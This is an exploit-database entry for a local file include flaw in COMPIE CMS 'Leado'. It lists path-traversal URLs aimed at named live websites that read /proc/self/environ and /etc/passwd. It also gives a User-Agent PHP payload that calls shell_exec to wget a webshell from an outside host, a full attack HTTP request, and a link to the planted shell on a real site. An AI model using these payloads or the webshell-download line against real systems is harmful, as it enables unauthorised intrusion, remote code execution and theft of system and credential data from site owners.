id: 37564
date: 03/31/2022
title: COMPIE CMS Leado Local File Include Vulnerability
author: HosseinXpR
cves: 

# Exploit Title: COMPIE CMS Leado Local File Include
# Google Dork: /index.php?pathAjax=
# Date: 3/30/2022
# Exploit Author: iranhack Security Team
# Vendor Homepage: iranhack.com
# Software Link: http://www.compie.co.il/
# Version: V.1.0 
# Tested on: KaliLinux,windows 10


Local File Include

http://www.tropicasa.co.il//index.php?pathAjax=../../../../../../../../../../../../../../../ proc/self/environ
http://www.awnings.co.il/index.php?pathAjax=../../../../../../../../../../../../../../../ proc/self/environ
https://www.dubytal.com/index.php?pathAjax=../../../etc/passwd

inject to User-Agent For Get webshell :

<? shell_exec ('wget https://www.site.com/webshell.txt -O hero.php3');?>




GET /index.php?pathAjax=../../../../../../../../../../../../../../../ proc/self/environ HTTP/1.1
Host: www.awnings.co.il
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: <? shell_exec ('wget https://www.site.com/webshell.txt -O hero.php3');?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=02fb0a6086ca3d9fa15a1fc241a7937a
Connection: close


Example :

http://www.awnings.co.il/hero.php3



#  0day.today [2023-03-24]  #